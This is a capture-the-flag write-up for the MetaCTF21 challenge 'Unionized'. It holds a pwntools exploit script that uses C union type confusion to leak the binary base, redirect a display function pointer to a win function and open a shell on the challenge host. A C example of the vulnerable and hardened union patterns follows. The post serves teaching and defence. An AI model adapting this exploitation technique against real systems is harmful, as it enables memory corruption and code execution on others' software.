MetaCTF21: Unionized

posted 2021-12-04 · type confusion with C unions
Why didn't anyone tell me about the magic of Unionized when I first started programming? I would have saved so much memory with these nifty things, don't you think? Here, try my application and tell me what you think host.cg21.metaproblems.com:3150.
from pwn import *
from time import sleep

context.arch = "amd64"

p = remote("host.cg21.metaproblems.com", 3150)
e = ELF("./chall")

############
# GET LEAK #
############

# Create string
p.readuntil(b"Exit")
p.sendline(b"1")
p.sendline(b"1")
p.sendline(b"10")
p.sendline(b"AAAAAAAA")

# Make char
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"4") # Char
p.sendline(b"\x70") # Value

pause()

# Make string
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"1") # String
p.sendline(b"5") # Len
p.sendline(b"AAAA") # Value

pause()

# Display it
p.readuntil(b"Exit")
p.sendline(b"2") # Display

p.readline()                      # discard the first line of Display output
leak = p.readline()
leak = leak[:-1][::-1].hex()      # drop newline, reverse little-endian bytes
leak = int(leak, 16)
leak = leak - 0x226               # offset from the leaked pointer back to the binary base
print("BASE LEAK:", hex(leak))
leak += 0x680                     # offset from the base to the win function
print("WIN FUNCTION:", hex(leak))

pause()

############
# CALL WIN #
############

# Create second chunk (int)
p.readuntil(b"Exit")
p.sendline(b"1") # Create
p.sendline(b"2") # Int
p.sendline(b"1337") # Value

# Make char point to next display addr
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"4") # Char
p.sendline(b"\xbf") # Value

# Make string
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"1") # String
p.sendline(b"10") # Len
p.sendline(b"\x00" + p64(leak)) # Value

pause()

# Call displays
p.readuntil(b"Exit")
p.sendline(b"2")

# Shell?!
p.interactive()

Flag: MetaCTF{Unions_Can_Be_Problematic}
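The primitive the script above relies on, shown in C as an added example (this is not the challenge's source, whose real struct layout is unknown; the struct, enum and function names here are assumptions): a tagged union where editing the tag rewrites only the new member, so turning a string item into a char overwrites the low byte of the stored heap pointer, next to a hardened version that releases and zeroes the payload on every type change and dispatches display strictly on the tag.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout of one menu item; the challenge's real struct may differ. */
enum kind { KIND_NONE = 0, KIND_STRING = 1, KIND_INT = 2, KIND_CHAR = 4 };
struct item {
    enum kind kind;
    union {
        char *str;        /* KIND_STRING: heap buffer */
        long num;         /* KIND_INT */
        unsigned char c;  /* KIND_CHAR: overlaps the low byte of str (little-endian) */
    } u;
};

/* ---- vulnerable pattern: the tag changes, the payload bytes do not ---- */
/* Writes a single byte into the union: the low byte of the stored pointer. */
static void vuln_edit_char(struct item *it, unsigned char c) {
    it->kind = KIND_CHAR;
    it->u.c = c;
}

/* Returns 1 if a char edit leaves the old string pointer with only its low
   byte changed, so a later string edit or display would use a shifted
   address. Pointer bytes are copied out, never dereferenced. */
int vuln_pointer_is_corrupted(void) {
    struct item it = { KIND_STRING, { .str = malloc(10) } };
    uintptr_t before, after;
    if (!it.u.str) return -1;
    snprintf(it.u.str, 10, "%s", "AAAAAAAA");   /* constructed input */
    char *orig = it.u.str;
    memcpy(&before, &it.u, sizeof before);
    vuln_edit_char(&it, 0x70);   /* the byte the writeup's script sends */
    memcpy(&after, &it.u, sizeof after);
    free(orig);
    return (after & 0xff) == 0x70 && (after >> 8) == (before >> 8);
}

/* ---- hardened pattern: every type change resets the payload first ---- */
static void safe_reset(struct item *it) {
    if (it->kind == KIND_STRING) free(it->u.str);
    memset(&it->u, 0, sizeof it->u);   /* no stale bytes survive a retype */
    it->kind = KIND_NONE;
}

static int safe_set_string(struct item *it, size_t len, const char *text) {
    safe_reset(it);
    if (len == 0 || len > 4096) return -1;
    it->u.str = calloc(len, 1);        /* always a fresh buffer */
    if (!it->u.str) return -1;
    snprintf(it->u.str, len, "%s", text);
    it->kind = KIND_STRING;
    return 0;
}

static void safe_set_char(struct item *it, unsigned char c) {
    safe_reset(it);
    it->u.c = c;
    it->kind = KIND_CHAR;
}

/* Display is driven only by the tag; no member is read under another tag. */
static int safe_display(const struct item *it, char *out, size_t outlen) {
    switch (it->kind) {
    case KIND_STRING: return snprintf(out, outlen, "string: %s", it->u.str);
    case KIND_INT:    return snprintf(out, outlen, "int: %ld", it->u.num);
    case KIND_CHAR:   return snprintf(out, outlen, "char: %c", it->u.c);
    default:          return snprintf(out, outlen, "(empty)");
    }
}

/* Same edit sequence through the hardened API: after the char edit the union
   holds the char followed by zero bytes, display follows the tag, and
   retyping back to a string allocates a fresh buffer. Returns 1 on success. */
int safe_sequence_ok(void) {
    struct item it = {0};
    unsigned char raw[sizeof it.u];
    char out[64];
    int ok = safe_set_string(&it, 10, "AAAAAAAA") == 0;
    safe_set_char(&it, 'p');                 /* 'p' == 0x70 */
    memcpy(raw, &it.u, sizeof raw);
    ok = ok && it.kind == KIND_CHAR && raw[0] == 0x70;
    for (size_t i = 1; i < sizeof raw; i++) ok = ok && raw[i] == 0;
    safe_display(&it, out, sizeof out);
    ok = ok && strcmp(out, "char: p") == 0;
    ok = ok && safe_set_string(&it, 5, "AAAA") == 0;
    safe_display(&it, out, sizeof out);
    ok = ok && strcmp(out, "string: AAAA") == 0;
    safe_reset(&it);
    return ok;
}
```

The defensive point is that a union is only as safe as the code that changes its tag: the first version lets the old pointer's bytes leak into the new interpretation, which is exactly what the script exploits by editing the char at index 0 and then re-typing it to a string, while the second version makes a retype an explicit free, zero and reallocate, so the old member can never be reached through the new one.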

If you have any questions or feedback, please email my public inbox at ~sourque/public-inbox@lists.sr.ht.